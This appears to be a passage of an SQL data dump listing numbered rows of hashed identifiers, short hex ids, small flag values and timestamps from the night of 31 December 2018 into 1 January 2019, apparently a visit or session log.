(44870, '3420ff921216785202b83fd698e1e6c5', '776dcce744ef316e', 0, 2, 1, '2018-12-31 21:17:32'),
(44871, 'e59eeee52471a0114cf6bea3d75981d8', 'e706e9a0184b2202', 0, 2, 1, '2018-12-31 21:17:34'),
(44872, '3420ff921216785202b83fd698e1e6c5', '776dcce744ef316e', 0, 2, 1, '2018-12-31 21:17:42'),
(44873, '663c020bddfd9d2d94ffe60e2e14e567', 'abe6c8ead564b456', 0, 2, 1, '2018-12-31 21:18:13'),
(44874, '663c020bddfd9d2d94ffe60e2e14e567', 'abe6c8ead564b456', 0, 2, 1, '2018-12-31 21:18:21'),
(44875, 'b55d2f1b0a402ffe64c8cd3a1ee33f5e', '4f8f2dbd3b012e31', 0, 2, 1, '2018-12-31 21:19:34'),
(44876, '6bb00cc7529d0d4abfcfe7dce15e5609', 'c5cb4fe55b6b1b30', 0, 2, 1, '2018-12-31 21:20:22'),
(44877, 'e59eeee52471a0114cf6bea3d75981d8', 'e706e9a0184b2202', 0, 2, 1, '2018-12-31 21:20:32'),
(44878, '3420ff921216785202b83fd698e1e6c5', '776dcce744ef316e', 0, 2, 1, '2018-12-31 21:21:14'),
(44879, '3420ff921216785202b83fd698e1e6c5', '776dcce744ef316e', 0, 2, 1, '2018-12-31 21:21:28'),
(44880, '3420ff921216785202b83fd698e1e6c5', '776dcce744ef316e', 0, 2, 1, '2018-12-31 21:21:44'),
(44881, '3420ff921216785202b83fd698e1e6c5', '776dcce744ef316e', 0, 2, 1, '2018-12-31 21:22:08'),
(44882, 'e706700b1e292841395e924211a62c62', 'a4d9d8225838853d', 0, 2, 1, '2018-12-31 21:22:10'),
(44883, '6bb00cc7529d0d4abfcfe7dce15e5609', 'c5cb4fe55b6b1b30', 0, 2, 1, '2018-12-31 21:24:02'),
(44884, 'e706700b1e292841395e924211a62c62', 'a4d9d8225838853d', 0, 2, 1, '2018-12-31 21:24:31'),
(44885, '63645a745c748e98fbba276bdcbb265a', 'cce9f53811556ad7', 0, 2, 1, '2018-12-31 21:24:36'),
(44886, '63645a745c748e98fbba276bdcbb265a', 'cce9f53811556ad7', 0, 2, 1, '2018-12-31 21:25:00'),
(44887, '42c3107fb4eaf73d42ce2ecbfd90e022', 'e706e9a0184b2202', 0, 2, 1, '2018-12-31 21:25:26'),
(44888, '2265fc3c1ce53590886ff9b6c3b6aa9f', 'a86d0aa20820f4cb', 0, 2, 1, '2018-12-31 21:26:21'),
(44889, '2adf0902152dbeb961f3385b27ba2374', '094c4fc3019f9165', 0, 2, 1, '2018-12-31 21:26:35'),
(44890, '7b1bc51f166644111bf8f8a98b8c3fc7', '00c91ba23c4f554f', 0, 2, 1, '2018-12-31 21:28:23'),
(44891, '807c1ec8b35c4b610b2cf6ffc224658d', 'ea556e706f8f9277', 0, 2, 1, '2018-12-31 21:28:28'),
(44892, '42c3107fb4eaf73d42ce2ecbfd90e022', 'e706e9a0184b2202', 0, 2, 1, '2018-12-31 21:28:32'),
(44893, '24fa6c340f5e4aff6bc3cbb8894e36e2', 'f7eeb8c92946914e', 0, 2, 1, '2018-12-31 21:30:24'),
(44894, '42c3107fb4eaf73d42ce2ecbfd90e022', 'e706e9a0184b2202', 0, 2, 1, '2018-12-31 21:31:25'),
(44895, '2adf0902152dbeb961f3385b27ba2374', '094c4fc3019f9165', 0, 2, 1, '2018-12-31 21:31:56'),
(44896, '2adf0902152dbeb961f3385b27ba2374', '094c4fc3019f9165', 0, 2, 1, '2018-12-31 21:32:44'),
(44897, '830a97882019bd680b12e5b2219f5935', '5c762bc36accb4ab', 0, 2, 1, '2018-12-31 21:33:50'),
(44898, 'c63e88cb63a0076f00cb38e442eb1e46', '6711272a62e81edf', 0, 2, 1, '2018-12-31 21:34:32'),
(44899, '3eda16b5094876543f892f2a0c565072', '7bdf59d0962b5119', 0, 2, 1, '2018-12-31 21:35:38'),
(44900, '3eda16b5094876543f892f2a0c565072', '7bdf59d0962b5119', 0, 2, 1, '2018-12-31 21:36:02'),
(44901, '573a0167d734961066ea3b11dce49426', 'ae84fe134cd5dfc1', 0, 2, 1, '2018-12-31 21:36:03'),
(44902, '63645a745c748e98fbba276bdcbb265a', 'cce9f53811556ad7', 0, 2, 1, '2018-12-31 21:36:25'),
(44903, '63645a745c748e98fbba276bdcbb265a', 'cce9f53811556ad7', 0, 2, 1, '2018-12-31 21:38:10'),
(44904, '7b1bc51f166644111bf8f8a98b8c3fc7', '00c91ba23c4f554f', 0, 2, 1, '2018-12-31 21:39:04'),
(44905, '2bbc600cf7cb98714e682c86d7937df2', 'fb2f52966817ff46', 0, 2, 1, '2018-12-31 21:39:34'),
(44906, '976a75b7080842514848df2caa36f1d7', 'a4d9d8225838853d', 0, 2, 1, '2018-12-31 21:39:56'),
(44907, '42c3107fb4eaf73d42ce2ecbfd90e022', 'e706e9a0184b2202', 0, 2, 1, '2018-12-31 21:40:03'),
(44908, '7b1bc51f166644111bf8f8a98b8c3fc7', '00c91ba23c4f554f', 0, 2, 1, '2018-12-31 21:44:27'),
(44909, '4f99c353643a83650c824e6e660e9665', 'e93773977d907ff0', 0, 2, 1, '2018-12-31 21:44:34'),
(44910, '42c3107fb4eaf73d42ce2ecbfd90e022', 'e706e9a0184b2202', 0, 2, 1, '2018-12-31 21:44:52'),
(44911, '91dddeba708096b0b78627253e3279b7', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2018-12-31 21:45:08'),
(44912, '4f99c353643a83650c824e6e660e9665', 'e93773977d907ff0', 0, 2, 1, '2018-12-31 21:45:45'),
(44913, '16bdfed829e190ebaa6d9ddba749ddcb', '5bd0aeefa5057666', 0, 2, 1, '2018-12-31 21:46:25'),
(44914, '91dddeba708096b0b78627253e3279b7', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2018-12-31 21:46:26'),
(44915, 'cc44777a8731015b2a170e7fd4f982ca', 'f657ff0647ad88d0', 0, 2, 1, '2018-12-31 21:46:41'),
(44916, '4f99c353643a83650c824e6e660e9665', 'e93773977d907ff0', 0, 2, 1, '2018-12-31 21:47:29'),
(44917, '4f99c353643a83650c824e6e660e9665', 'e93773977d907ff0', 0, 2, 1, '2018-12-31 21:47:51'),
(44918, '7bcbf450c74bdb48c3a8c4a99abb4cd6', '74aba437eea39f30', 0, 2, 1, '2018-12-31 21:48:40'),
(44919, '4f99c353643a83650c824e6e660e9665', 'e93773977d907ff0', 0, 2, 1, '2018-12-31 21:48:49'),
(44920, 'a7f35052a6b3cc80c6443d299e0e8abe', 'fcaa3c8d44082e09', 0, 2, 1, '2018-12-31 21:49:23'),
(44921, '4f99c353643a83650c824e6e660e9665', 'e93773977d907ff0', 0, 2, 1, '2018-12-31 21:49:33'),
(44922, '4f99c353643a83650c824e6e660e9665', 'e93773977d907ff0', 0, 2, 1, '2018-12-31 21:49:51'),
(44923, '4f99c353643a83650c824e6e660e9665', 'e93773977d907ff0', 0, 2, 1, '2018-12-31 21:50:31'),
(44924, '4f99c353643a83650c824e6e660e9665', 'e93773977d907ff0', 0, 2, 1, '2018-12-31 21:50:41'),
(44925, '63645a745c748e98fbba276bdcbb265a', 'cce9f53811556ad7', 0, 2, 1, '2018-12-31 21:51:14'),
(44926, '4f99c353643a83650c824e6e660e9665', 'e93773977d907ff0', 0, 2, 1, '2018-12-31 21:51:21'),
(44927, 'a68cff2bef45e2885a98e3e81e57072b', '02ee6768142e877d', 0, 2, 1, '2018-12-31 21:53:33'),
(44928, '49612b8c3db1d64a25fd1eec894aa365', '296d9de09b136627', 0, 2, 1, '2018-12-31 21:55:24'),
(44929, '2e0eeec1e1c569d94fa43a908ec11d54', '0bc2b417348310de', 0, 2, 1, '2018-12-31 21:55:55'),
(44930, '2e0eeec1e1c569d94fa43a908ec11d54', '0bc2b417348310de', 0, 2, 1, '2018-12-31 21:56:12'),
(44931, '4f99c353643a83650c824e6e660e9665', 'e93773977d907ff0', 0, 2, 1, '2018-12-31 21:56:53'),
(44932, '4834b8e55a4c6ce8264ea806afd5b128', 'e3454d790deac400', 0, 2, 1, '2018-12-31 21:57:04'),
(44933, '41b3db1f1c0726cf92283d20325909bd', '015a6aff1aa4fed3', 0, 2, 1, '2018-12-31 21:57:09'),
(44934, '4834b8e55a4c6ce8264ea806afd5b128', 'e3454d790deac400', 0, 2, 1, '2018-12-31 21:57:30'),
(44935, '41b3db1f1c0726cf92283d20325909bd', '015a6aff1aa4fed3', 0, 2, 1, '2018-12-31 21:57:51'),
(44936, '41b3db1f1c0726cf92283d20325909bd', '015a6aff1aa4fed3', 0, 2, 1, '2018-12-31 21:58:02'),
(44937, '67e5f2058a558fcf786d220077391208', '960d12b6c14f65ca', 0, 2, 1, '2018-12-31 21:59:00'),
(44938, 'b4386ae687675a0cbbb57a84ac1bce77', '2034f09284a4c7ca', 0, 2, 1, '2018-12-31 22:00:17'),
(44939, 'becd2f362896ac50412c082558517e4b', 'f19010d8a5f137d0', 0, 2, 1, '2018-12-31 22:03:14'),
(44940, 'd2a12f4179961e854f7a554421535900', 'c69b16a8ac60521f', 0, 2, 1, '2018-12-31 22:03:23'),
(44941, 'ca48b469a5a7ebfa18494324ec6aa943', 'a7ac1a8be136b869', 0, 2, 1, '2018-12-31 22:05:02'),
(44942, '67e5f2058a558fcf786d220077391208', '960d12b6c14f65ca', 0, 2, 1, '2018-12-31 22:05:16'),
(44943, '1c74275673f5eba17ab496590c93c7c1', '1791b1aeb2327e22', 0, 2, 1, '2018-12-31 22:05:31'),
(44944, '1c74275673f5eba17ab496590c93c7c1', '1791b1aeb2327e22', 0, 2, 1, '2018-12-31 22:05:46'),
(44945, '7894e22861c94df42e38a0a4d5c86d08', 'b53c70bea01d2d6e', 0, 2, 1, '2018-12-31 22:06:03'),
(44946, '735eac85687ec652c4ab0c67832c6a7f', '8a144e5fc2e94311', 0, 2, 1, '2018-12-31 22:06:09'),
(44947, 'd5f8d190618469c1cade12779e1b866a', 'bd642c3b862fc466', 0, 2, 1, '2018-12-31 22:08:22'),
(44948, '1c74275673f5eba17ab496590c93c7c1', '1791b1aeb2327e22', 0, 2, 1, '2018-12-31 22:08:30'),
(44949, 'a68cff2bef45e2885a98e3e81e57072b', '02ee6768142e877d', 0, 2, 1, '2018-12-31 22:08:33'),
(44950, '592bf9fb5a0e07941104325205b7d3be', '9113ca554f25f876', 0, 2, 1, '2018-12-31 22:09:08'),
(44951, '1c74275673f5eba17ab496590c93c7c1', '1791b1aeb2327e22', 0, 2, 1, '2018-12-31 22:10:05'),
(44952, 'c63e88cb63a0076f00cb38e442eb1e46', '6711272a62e81edf', 0, 2, 1, '2018-12-31 22:10:13'),
(44953, '1c74275673f5eba17ab496590c93c7c1', '1791b1aeb2327e22', 0, 2, 1, '2018-12-31 22:10:26'),
(44954, '1c74275673f5eba17ab496590c93c7c1', '1791b1aeb2327e22', 0, 2, 1, '2018-12-31 22:10:59'),
(44955, '1c74275673f5eba17ab496590c93c7c1', '1791b1aeb2327e22', 0, 2, 1, '2018-12-31 22:12:21'),
(44956, '1c74275673f5eba17ab496590c93c7c1', '1791b1aeb2327e22', 0, 2, 1, '2018-12-31 22:12:36'),
(44957, '9c3146a1c7fa1e66f22f92d03eecaefd', '45557f71f98e1e99', 0, 2, 1, '2018-12-31 22:14:05'),
(44958, '97c5e82cbf4a927741d1a25fb2ab0148', '8e815b2f4d02fe94', 0, 2, 1, '2018-12-31 22:14:36'),
(44959, '24fa6c340f5e4aff6bc3cbb8894e36e2', 'f7eeb8c92946914e', 0, 2, 1, '2018-12-31 22:14:44'),
(44960, 'e2030d9473af54cd398520e7971fa353', '113a26d6adf3f967', 0, 2, 1, '2018-12-31 22:15:17'),
(44961, 'e2030d9473af54cd398520e7971fa353', '113a26d6adf3f967', 0, 2, 1, '2018-12-31 22:17:52'),
(44962, 'ae1f4e0bf1df65f4f54a973dfcdab00d', '6a9dd6888bcb8fcc', 0, 2, 1, '2018-12-31 22:19:52'),
(44963, '1c74275673f5eba17ab496590c93c7c1', '1791b1aeb2327e22', 0, 2, 1, '2018-12-31 22:20:04'),
(44964, '1c74275673f5eba17ab496590c93c7c1', '1791b1aeb2327e22', 0, 2, 1, '2018-12-31 22:20:26'),
(44965, '11da8c9c381bef5f5f81b0ba0166f1b0', 'ee0826f8778c48c2', 0, 2, 1, '2018-12-31 22:22:42'),
(44966, '24fa6c340f5e4aff6bc3cbb8894e36e2', 'f7eeb8c92946914e', 0, 2, 1, '2018-12-31 22:24:34'),
(44967, 'e2030d9473af54cd398520e7971fa353', '113a26d6adf3f967', 0, 2, 1, '2018-12-31 22:24:36'),
(44968, '24fa6c340f5e4aff6bc3cbb8894e36e2', 'f7eeb8c92946914e', 0, 2, 1, '2018-12-31 22:25:01'),
(44969, '44342f20b784c5643e1d317a886e805c', '779493fa905c6d91', 0, 2, 1, '2018-12-31 22:26:45'),
(44970, '735eac85687ec652c4ab0c67832c6a7f', '8a144e5fc2e94311', 0, 2, 1, '2018-12-31 22:28:32'),
(44971, '44342f20b784c5643e1d317a886e805c', '779493fa905c6d91', 0, 2, 1, '2018-12-31 22:28:43'),
(44972, '44342f20b784c5643e1d317a886e805c', '779493fa905c6d91', 0, 2, 1, '2018-12-31 22:28:54'),
(44973, 'afed60b3f5df5950417a1bc76e28b4ae', '33f9389652fef1ac', 0, 2, 1, '2018-12-31 22:31:00'),
(44974, '9a393ab25949b4642b49d22452af22a0', 'b3880bb4f7ba6dd3', 0, 2, 1, '2018-12-31 22:32:25'),
(44975, '24fa6c340f5e4aff6bc3cbb8894e36e2', 'f7eeb8c92946914e', 0, 2, 1, '2018-12-31 22:35:18'),
(44976, '24fa6c340f5e4aff6bc3cbb8894e36e2', 'f7eeb8c92946914e', 0, 2, 1, '2018-12-31 22:35:36'),
(44977, '0193a3004a9efe62e319d43abf29d71d', '4752c8cc4e1a75ca', 0, 2, 1, '2018-12-31 22:35:37'),
(44978, '0e6d2b1cc75c37b52cc91a0e882eef02', 'eed82a618653b0f0', 0, 2, 1, '2018-12-31 22:36:44'),
(44979, '7743b87f45981cfae403ecc1ab8f611e', '15fdd013f34287ab', 0, 2, 1, '2018-12-31 22:38:04'),
(44980, '12848be122d8aa1c48f6ab58ce69d3a6', '11e6aced22c26021', 0, 2, 1, '2018-12-31 22:38:08'),
(44981, '7743b87f45981cfae403ecc1ab8f611e', '15fdd013f34287ab', 0, 2, 1, '2018-12-31 22:38:44'),
(44982, '7743b87f45981cfae403ecc1ab8f611e', '15fdd013f34287ab', 0, 2, 1, '2018-12-31 22:39:21'),
(44983, '0193a3004a9efe62e319d43abf29d71d', '4752c8cc4e1a75ca', 0, 2, 1, '2018-12-31 22:39:30'),
(44984, '4fcddfc78a521366628b1a666c0e5e5a', 'd09a3a195511f770', 0, 2, 1, '2018-12-31 22:40:45'),
(44985, '4fcddfc78a521366628b1a666c0e5e5a', 'd09a3a195511f770', 0, 2, 1, '2018-12-31 22:41:06'),
(44986, 'a68cff2bef45e2885a98e3e81e57072b', '02ee6768142e877d', 0, 2, 1, '2018-12-31 22:42:12'),
(44987, 'a68cff2bef45e2885a98e3e81e57072b', '02ee6768142e877d', 0, 2, 1, '2018-12-31 22:42:49'),
(44988, '24fa6c340f5e4aff6bc3cbb8894e36e2', 'f7eeb8c92946914e', 0, 2, 1, '2018-12-31 22:44:59'),
(44989, '24fa6c340f5e4aff6bc3cbb8894e36e2', 'f7eeb8c92946914e', 0, 2, 1, '2018-12-31 22:45:10'),
(44990, '0193a3004a9efe62e319d43abf29d71d', '4752c8cc4e1a75ca', 0, 2, 1, '2018-12-31 22:46:16'),
(44991, '67e5f2058a558fcf786d220077391208', '960d12b6c14f65ca', 0, 2, 1, '2018-12-31 22:46:58'),
(44992, '125ce0d4a3361b8cf3aac2065543d01f', '5ab414c1fac0f9a5', 0, 2, 1, '2018-12-31 22:49:41'),
(44993, '4af9ad788229cf232e71117de88da2c0', 'c5cb4fe55b6b1b30', 0, 2, 1, '2018-12-31 22:49:42'),
(44994, '01020a0f0d26c41cc633ab8ab79d4849', 'afdb985b4766b5e9', 0, 2, 1, '2018-12-31 22:49:51'),
(44995, '4af9ad788229cf232e71117de88da2c0', 'c5cb4fe55b6b1b30', 0, 2, 1, '2018-12-31 22:52:09'),
(44996, 'dc7ada3e064fab23ad2c1621e42ce76e', 'd905440517b4d240', 0, 2, 1, '2018-12-31 22:52:23'),
(44997, 'dc7ada3e064fab23ad2c1621e42ce76e', 'd905440517b4d240', 0, 2, 1, '2018-12-31 22:52:35'),
(44998, '9407faf8150bd41c014cf94a8cfc3489', 'fcaa3c8d44082e09', 0, 2, 1, '2018-12-31 22:52:40'),
(44999, 'd8f905d52a13225f8e48d706f6138e62', 'efb4967d83ce4696', 0, 2, 1, '2018-12-31 22:53:52'),
(45000, '2676ec39ea449fad25a7ddcd829695f8', 'c97d66da123a2aee', 0, 2, 1, '2018-12-31 22:54:00'),
(45001, 'dc7ada3e064fab23ad2c1621e42ce76e', 'd905440517b4d240', 0, 2, 1, '2018-12-31 22:54:41'),
(45002, 'dc7ada3e064fab23ad2c1621e42ce76e', 'd905440517b4d240', 0, 2, 1, '2018-12-31 22:55:14'),
(45003, '12848be122d8aa1c48f6ab58ce69d3a6', '11e6aced22c26021', 0, 2, 1, '2018-12-31 22:55:28'),
(45004, '798149f6ace31419a69aa6a4c829d983', '8b67051b42687f96', 0, 2, 1, '2018-12-31 22:58:20'),
(45005, '266291793681fe6aacccc32e8f2df91c', 'e64ed842304de12b', 0, 2, 1, '2018-12-31 23:00:39'),
(45006, '7ac80d1af80a41f9fe64ca7587bb0bfa', '5d7397a3150c94ff', 0, 2, 1, '2018-12-31 23:01:25'),
(45007, '266291793681fe6aacccc32e8f2df91c', 'e64ed842304de12b', 0, 2, 1, '2018-12-31 23:01:44'),
(45008, '17f5b9f17acc75bffbf46f4dde31cb61', 'a4d896a6fb2e7ba8', 0, 2, 1, '2018-12-31 23:02:05'),
(45009, '17f5b9f17acc75bffbf46f4dde31cb61', 'a4d896a6fb2e7ba8', 0, 2, 1, '2018-12-31 23:02:29'),
(45010, 'a8b76c6d0f9611a9861402d9438810a5', '95e387d810fd5cc4', 0, 2, 1, '2018-12-31 23:03:48'),
(45011, '266291793681fe6aacccc32e8f2df91c', 'e64ed842304de12b', 0, 2, 1, '2018-12-31 23:04:58'),
(45012, '040042413b55e8c7507085e5ee8e89bf', '7307420404a200fe', 0, 2, 1, '2018-12-31 23:07:59'),
(45013, '040042413b55e8c7507085e5ee8e89bf', '7307420404a200fe', 0, 2, 1, '2018-12-31 23:08:11'),
(45014, '003d10951f6b8d65e22c0e9264e586f3', 'ede60f01d64f0b42', 0, 2, 1, '2018-12-31 23:09:13'),
(45015, '1c74275673f5eba17ab496590c93c7c1', '1791b1aeb2327e22', 0, 2, 1, '2018-12-31 23:09:32'),
(45016, '040042413b55e8c7507085e5ee8e89bf', '7307420404a200fe', 0, 2, 1, '2018-12-31 23:09:55'),
(45017, '24fa6c340f5e4aff6bc3cbb8894e36e2', 'f7eeb8c92946914e', 0, 2, 1, '2018-12-31 23:11:44'),
(45018, '266291793681fe6aacccc32e8f2df91c', 'e64ed842304de12b', 0, 2, 1, '2018-12-31 23:13:15'),
(45019, 'e84d7254f70602cba017730510b6bced', '0590f2c35fb16469', 0, 2, 1, '2018-12-31 23:13:41'),
(45020, 'e84d7254f70602cba017730510b6bced', '0590f2c35fb16469', 0, 2, 1, '2018-12-31 23:13:46'),
(45021, '040042413b55e8c7507085e5ee8e89bf', '7307420404a200fe', 0, 2, 1, '2018-12-31 23:14:57'),
(45022, '040042413b55e8c7507085e5ee8e89bf', '7307420404a200fe', 0, 2, 1, '2018-12-31 23:15:11'),
(45023, 'ab8724fc6de70eb54afe8e1e6ae64d57', 'cb6b61634331b281', 0, 2, 1, '2018-12-31 23:16:49'),
(45024, '4a8fb396678fd612baa6f06b6437d809', 'e5ac70981815b3ea', 0, 2, 1, '2018-12-31 23:16:56'),
(45025, '627c9e2775195a4026e5d4b091488a3f', '50080d2f51d583a8', 0, 2, 1, '2018-12-31 23:17:10'),
(45026, '627c9e2775195a4026e5d4b091488a3f', '50080d2f51d583a8', 0, 2, 1, '2018-12-31 23:17:44'),
(45027, '627c9e2775195a4026e5d4b091488a3f', '50080d2f51d583a8', 0, 2, 1, '2018-12-31 23:18:01'),
(45028, '03b9eb4ae441db9d60b89a7b3c4bee9f', '776dcce744ef316e', 0, 2, 1, '2018-12-31 23:19:38'),
(45029, '09d3408e6f199cff0d19b132d00b9e14', 'aadeea81a8c08027', 0, 2, 1, '2018-12-31 23:23:38'),
(45030, '1d18510abb0de12c0e205502d436a9c8', 'c5cb4fe55b6b1b30', 0, 2, 1, '2018-12-31 23:24:02'),
(45031, '09d3408e6f199cff0d19b132d00b9e14', 'aadeea81a8c08027', 0, 2, 1, '2018-12-31 23:24:04'),
(45032, '1c74275673f5eba17ab496590c93c7c1', '1791b1aeb2327e22', 0, 2, 1, '2018-12-31 23:28:09'),
(45033, 'a8b76c6d0f9611a9861402d9438810a5', '95e387d810fd5cc4', 0, 2, 1, '2018-12-31 23:28:15'),
(45034, 'e52badd64dbcaedeb51021b078acca56', '27b5cc7b2e2c83e1', 0, 2, 1, '2018-12-31 23:28:56'),
(45035, '03b9eb4ae441db9d60b89a7b3c4bee9f', '776dcce744ef316e', 0, 2, 1, '2018-12-31 23:30:53'),
(45036, '1d18510abb0de12c0e205502d436a9c8', 'c5cb4fe55b6b1b30', 0, 2, 1, '2018-12-31 23:31:50'),
(45037, 'de9239e89f7158f830707d733bd209a8', 'cff6a6d6076e274f', 0, 2, 1, '2018-12-31 23:32:17'),
(45038, '1d18510abb0de12c0e205502d436a9c8', 'c5cb4fe55b6b1b30', 0, 2, 1, '2018-12-31 23:32:39'),
(45039, '03b9eb4ae441db9d60b89a7b3c4bee9f', '776dcce744ef316e', 0, 2, 1, '2018-12-31 23:34:02'),
(45040, '1d18510abb0de12c0e205502d436a9c8', 'c5cb4fe55b6b1b30', 0, 2, 1, '2018-12-31 23:34:23'),
(45041, 'de9239e89f7158f830707d733bd209a8', 'cff6a6d6076e274f', 0, 2, 1, '2018-12-31 23:34:29'),
(45042, 'de9239e89f7158f830707d733bd209a8', 'cff6a6d6076e274f', 0, 2, 1, '2018-12-31 23:34:29'),
(45043, 'e2030d9473af54cd398520e7971fa353', '113a26d6adf3f967', 0, 2, 1, '2018-12-31 23:35:33'),
(45044, '266291793681fe6aacccc32e8f2df91c', 'e64ed842304de12b', 0, 2, 1, '2018-12-31 23:35:51'),
(45045, 'e2030d9473af54cd398520e7971fa353', '113a26d6adf3f967', 0, 2, 1, '2018-12-31 23:37:59'),
(45046, '266291793681fe6aacccc32e8f2df91c', 'e64ed842304de12b', 0, 2, 1, '2018-12-31 23:38:13'),
(45047, '798149f6ace31419a69aa6a4c829d983', '8b67051b42687f96', 0, 2, 1, '2018-12-31 23:38:56'),
(45048, '830a97882019bd680b12e5b2219f5935', '5c762bc36accb4ab', 0, 2, 1, '2018-12-31 23:39:20'),
(45049, '7001f29c9bb7a2d18441b1d77d7faf36', 'da6c922121ca1f89', 0, 2, 1, '2018-12-31 23:39:30'),
(45050, 'b19bf75f5b6d67df02ac29b549f338f3', '1791b1aeb2327e22', 0, 2, 1, '2018-12-31 23:40:15'),
(45051, '798149f6ace31419a69aa6a4c829d983', '8b67051b42687f96', 0, 2, 1, '2018-12-31 23:42:04'),
(45052, '798149f6ace31419a69aa6a4c829d983', '8b67051b42687f96', 0, 2, 1, '2018-12-31 23:42:39'),
(45053, '24fa6c340f5e4aff6bc3cbb8894e36e2', 'f7eeb8c92946914e', 0, 2, 1, '2018-12-31 23:42:51'),
(45054, 'd2a12f4179961e854f7a554421535900', 'c69b16a8ac60521f', 0, 2, 1, '2018-12-31 23:44:54'),
(45055, '798149f6ace31419a69aa6a4c829d983', '8b67051b42687f96', 0, 2, 1, '2018-12-31 23:45:10'),
(45056, '0fbb81ed12db20465e43da636c8f3a6c', '417b807dff7c6249', 0, 2, 1, '2018-12-31 23:52:07'),
(45057, '4691b2643ea502c01827744b4d734edd', '2b35667312f23c7e', 0, 2, 1, '2018-12-31 23:52:45'),
(45058, '9acbb32fb69e54766ab394f988dacba4', '546a42ea57836277', 0, 2, 1, '2018-12-31 23:54:53'),
(45059, '9acbb32fb69e54766ab394f988dacba4', '546a42ea57836277', 0, 2, 1, '2018-12-31 23:55:28'),
(45060, '91dddeba708096b0b78627253e3279b7', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2018-12-31 23:56:18'),
(45061, '9acbb32fb69e54766ab394f988dacba4', '546a42ea57836277', 0, 2, 1, '2018-12-31 23:56:59'),
(45062, '9acbb32fb69e54766ab394f988dacba4', '546a42ea57836277', 0, 2, 1, '2018-12-31 23:57:15'),
(45063, '040042413b55e8c7507085e5ee8e89bf', '7307420404a200fe', 0, 2, 1, '2018-12-31 23:58:25'),
(45064, '5b8ceaf81756573adf6301131e09c15e', 'bf29a2f61bb42031', 0, 2, 1, '2019-01-01 00:01:15'),
(45065, '5b8ceaf81756573adf6301131e09c15e', 'bf29a2f61bb42031', 0, 2, 1, '2019-01-01 00:01:26'),
(45066, '21e8129d5376c64a1003f82ea913a67a', 'baa8d16c1a4e5230', 0, 2, 1, '2019-01-01 00:02:11'),
(45067, '5b8ceaf81756573adf6301131e09c15e', 'bf29a2f61bb42031', 0, 2, 1, '2019-01-01 00:02:18'),
(45068, '21e8129d5376c64a1003f82ea913a67a', 'baa8d16c1a4e5230', 0, 2, 1, '2019-01-01 00:02:18'),
(45069, '5b8ceaf81756573adf6301131e09c15e', 'bf29a2f61bb42031', 0, 2, 1, '2019-01-01 00:02:21'),
(45070, '5b8ceaf81756573adf6301131e09c15e', 'bf29a2f61bb42031', 0, 2, 1, '2019-01-01 00:02:31'),
(45071, '0f6524743b0c6f1e795ed4999124449a', 'deecf79c7d53dde5', 0, 2, 1, '2019-01-01 00:02:51'),
(45072, '5b8ceaf81756573adf6301131e09c15e', 'bf29a2f61bb42031', 0, 2, 1, '2019-01-01 00:02:52'),
(45073, '91dddeba708096b0b78627253e3279b7', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2019-01-01 00:02:57'),
(45074, '5b8ceaf81756573adf6301131e09c15e', 'bf29a2f61bb42031', 0, 2, 1, '2019-01-01 00:03:07'),
(45075, '91dddeba708096b0b78627253e3279b7', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2019-01-01 00:03:13'),
(45076, '5b8ceaf81756573adf6301131e09c15e', 'bf29a2f61bb42031', 0, 2, 1, '2019-01-01 00:03:16'),
(45077, '0f6524743b0c6f1e795ed4999124449a', 'deecf79c7d53dde5', 0, 2, 1, '2019-01-01 00:04:16'),
(45078, '0f6524743b0c6f1e795ed4999124449a', 'deecf79c7d53dde5', 0, 2, 1, '2019-01-01 00:04:53'),
(45079, 'bdbfda2b06d66fbf88003bf773c3db67', '624d6937076d1188', 0, 2, 1, '2019-01-01 00:05:07'),
(45080, 'bdbfda2b06d66fbf88003bf773c3db67', '624d6937076d1188', 0, 2, 1, '2019-01-01 00:05:19'),
(45081, 'bdbfda2b06d66fbf88003bf773c3db67', '624d6937076d1188', 0, 2, 1, '2019-01-01 00:05:33'),
(45082, '0f6524743b0c6f1e795ed4999124449a', 'deecf79c7d53dde5', 0, 2, 1, '2019-01-01 00:05:39'),
(45083, 'bdbfda2b06d66fbf88003bf773c3db67', '624d6937076d1188', 0, 2, 1, '2019-01-01 00:05:39'),
(45084, '0f6524743b0c6f1e795ed4999124449a', 'deecf79c7d53dde5', 0, 2, 1, '2019-01-01 00:05:50'),
(45085, '0f6524743b0c6f1e795ed4999124449a', 'deecf79c7d53dde5', 0, 2, 1, '2019-01-01 00:06:06'),
(45086, '0f6524743b0c6f1e795ed4999124449a', 'deecf79c7d53dde5', 0, 2, 1, '2019-01-01 00:06:36'),
(45087, '8bdd4becbb8f3e4b0798d67341e12d12', 'e764f080dbedd41f', 0, 2, 1, '2019-01-01 00:11:55'),
(45088, '8bdd4becbb8f3e4b0798d67341e12d12', 'e764f080dbedd41f', 0, 2, 1, '2019-01-01 00:13:10'),
(45089, '8bdd4becbb8f3e4b0798d67341e12d12', 'e764f080dbedd41f', 0, 2, 1, '2019-01-01 00:13:41'),
(45090, '8bdd4becbb8f3e4b0798d67341e12d12', 'e764f080dbedd41f', 0, 2, 1, '2019-01-01 00:15:24'),
(45091, '266291793681fe6aacccc32e8f2df91c', 'e64ed842304de12b', 0, 2, 1, '2019-01-01 00:15:40'),
(45092, '91dddeba708096b0b78627253e3279b7', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2019-01-01 00:23:41'),
(45093, 'a81b1efd355eddcbf60d9b3f8b82894e', '9b439e4e6dd53e8a', 0, 2, 1, '2019-01-01 00:32:14'),
(45094, 'a81b1efd355eddcbf60d9b3f8b82894e', '9b439e4e6dd53e8a', 0, 2, 1, '2019-01-01 00:33:03'),
(45095, 'f792ec7ace3a58c67c00fb8fee6cc44e', '55bd1d9528102569', 0, 2, 1, '2019-01-01 00:33:32'),
(45096, 'f792ec7ace3a58c67c00fb8fee6cc44e', '55bd1d9528102569', 0, 2, 1, '2019-01-01 00:33:40'),
(45097, 'f792ec7ace3a58c67c00fb8fee6cc44e', '55bd1d9528102569', 0, 2, 1, '2019-01-01 00:33:52'),
(45098, 'f792ec7ace3a58c67c00fb8fee6cc44e', '55bd1d9528102569', 0, 2, 1, '2019-01-01 00:33:56'),
(45099, 'cfc4dfb21623f81afd71549704be2939', '9234c34668bf2ded', 0, 2, 1, '2019-01-01 00:42:10'),
(45100, 'b268d392f63847273c8939ab297265f1', '420a87defd5f0008', 0, 2, 1, '2019-01-01 00:47:07'),
